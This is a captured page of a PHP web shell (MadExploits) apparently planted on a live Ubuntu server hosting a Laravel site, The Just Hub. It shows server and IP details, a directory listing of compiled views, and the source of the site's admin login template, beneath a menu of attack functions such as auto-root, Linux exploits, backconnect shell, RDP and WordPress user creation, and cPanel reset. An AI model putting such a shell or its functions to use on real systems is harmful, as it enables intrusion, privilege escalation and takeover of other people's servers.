Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.33
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
storage /
framework /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
.gitignore
14
B
-rw-r--r--
0007c0482aa5f5bf2f025806d0edfd...
2.86
KB
-rw-r--r--
10c27b214dccc7f15d15da79ac8470...
410
B
-rw-r--r--
1403d9d192af58fe31fb9996ef7aa8...
2.99
KB
-rw-r--r--
1aac04e28a45a544f1837c92c4eff0...
3.39
KB
-rw-r--r--
1b746ee568746cfba0718cee49f5e2...
1.55
KB
-rw-r--r--
21423dcd24eb27dac2740f8be149e7...
1.63
KB
-rw-r--r--
218988a1937bbed1de6fce295c4134...
8.64
KB
-rw-r--r--
35061d12d26aabb07688d04d4afb4d...
856
B
-rw-r--r--
3a5dd5b82e046d7efcb4b69b262def...
6.48
KB
-rw-r--r--
3cad9dcf56bb9814dd4a9d3ce87af5...
2.52
KB
-rw-r--r--
3fe69c1bf2da80e94d5f015d002278...
7.62
KB
-rw-r--r--
44e61a513a8d64b2eb35c1f128c3f2...
4.38
KB
-rw-r--r--
520b297ea23905dbcc2d3b25a561b5...
2.5
KB
-rw-r--r--
527e46fa9f7d5bec2594d905cbd421...
7.06
KB
-rw-r--r--
579fcc4a66d41ac47d6b0d1ff890f4...
5.34
KB
-rw-r--r--
5ed70bc03ef08d4af09849b8efef00...
4.42
KB
-rw-r--r--
62a148c82942d297c63f0f0f02439b...
6.66
KB
-rw-r--r--
7880f401696d98acd483091a3a710c...
2.85
KB
-rw-r--r--
7cb00fc6dda10538825ee8bb2f5d60...
4.26
KB
-rw-r--r--
81eaf552cd586bb87780a832d0ee25...
1.41
KB
-rw-r--r--
9b1bd25a7959e2ee99221dcc184f4a...
1.27
KB
-rw-r--r--
a10258ec81201d4423e45395c96432...
1.05
KB
-rw-r--r--
a1b17d563725695943af990662c11d...
1.34
KB
-rw-r--r--
a3af48bae84e975844e068b9259223...
2.64
KB
-rw-r--r--
ab82a2c11ed87408fdd9dfb6c02d89...
7.28
KB
-rw-r--r--
b1b98f22c773f88aede035857fccfb...
3.17
KB
-rw-r--r--
b7e991354aa061be4f65e5dab60c80...
18.68
KB
-rw-r--r--
b9e80a53f49e02fe01124f92f8e85a...
5.05
KB
-rw-r--r--
be1a5e9809d8020d3f0498ef7afa1c...
3.77
KB
-rw-r--r--
c38973b9887efe4d75ebcf159e664a...
6.67
KB
-rw-r--r--
d6546978e2976ecb0db2e02a311f0b...
1.04
KB
-rw-r--r--
de9e59cd51381870124ebdb1b11213...
3.74
KB
-rw-r--r--
df91b5c97879b28928e1dd78ba6d73...
4.4
KB
-rw-r--r--
e46707f556d0ef8bc3b0d8cb1deedf...
6.44
KB
-rw-r--r--
ed59c13ff5bebe90d90116a554d1d6...
7.94
KB
-rw-r--r--
eec44f02f8588a2f36f31f1ead0ed5...
4.15
KB
-rw-r--r--
f5c7b9dfb478d0042aaeadb0f36105...
4.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 5ed70bc03ef08d4af09849b8efef0055a7d6ded8.php
<?php $__env->startSection('contents'); ?> <div class="ch-container"> <div class="row"> <div class="row"> <div class="col-md-12 center login-header"> <h2>Welcome to The Just Hub - Admin Panel</h2> <img alt="Muslims Learning" src="<?php echo asset('assets');?>/images/logo-just-hub.png" width="" height=""style="width: 22%" class="img-fluid" /> </div> <!--/span--> </div> <!--/row--> <div class="row" style="margin-top:60px;"> <div class="well col-md-5 center login-box"> <!--<div class="alert alert-info"> Please login with your Username and Password. </div>--> <?php if($errors->any()): ?> <div class="alert alert-danger fade in"> <a href="#" class="close" data-dismiss="alert">×</a> <?php if($errors->any()): ?> <?php echo implode('', $errors->all('<div>:message</div>')); ?> <?php endif; ?> </div> <?php endif; ?> <form action="<?php echo e(route('admin.login')); ?>" id="admin_login"> <?php echo csrf_field(); ?> <fieldset> <div class="input-group input-group-lg"> <span class="input-group-addon"><i class="glyphicon glyphicon-user red"></i></span> <input type="text" class="form-control required" name="username" id="username" placeholder="Username"> </div> <div class="clearfix"></div> <br> <div class="input-group input-group-lg"> <span class="input-group-addon"><i class="glyphicon glyphicon-lock red"></i></span> <input type="password" name="password" id="password" class="form-control required" placeholder="Password"> </div> <div class="clearfix"></div> <div class="input-prepend"> <label class="remember" for="remember"> <input type="checkbox" name="remember" id="remember"> Remember me</label> </div> <div class="clearfix"></div> <p class="center col-md-5"> <button type="submit" class="btn btn-primary">Login</button> </p> </fieldset> </form> </div> <!--/span--> </div> <!--/row--> </div> <!--/fluid-row--> </div> <?php $__env->stopSection(); ?> <?php $__env->startPush('scripts'); ?> <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.3/jquery.validate.min.js"></script> <script> $("#admin_login").on('submit',function (e){ e.preventDefault(); }); $('#admin_login').validate({ submitHandler: function (form) { $.ajax({ url:$('#admin_login').attr('action'), type:'post', data:new FormData(form), cache:false, processData: false, contentType: false, success:function (data){ if(data.success){ swal.fire({ position: 'top-end', icon: 'success', title: data.success.message, showConfirmButton: false, timer: 1500 }) window.location.href='<?php echo e(route('dashboard')); ?>' }else { swal.fire({ position: 'top-end', icon: 'error', title: data.error.message, showConfirmButton: false, timer: 1500 }) } } }) }, }); </script> <?php $__env->stopPush(); ?> <?php echo $__env->make('admin.layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /var/www/justhub/source/resources/views/admin/login.blade.php ENDPATH**/ ?>
Close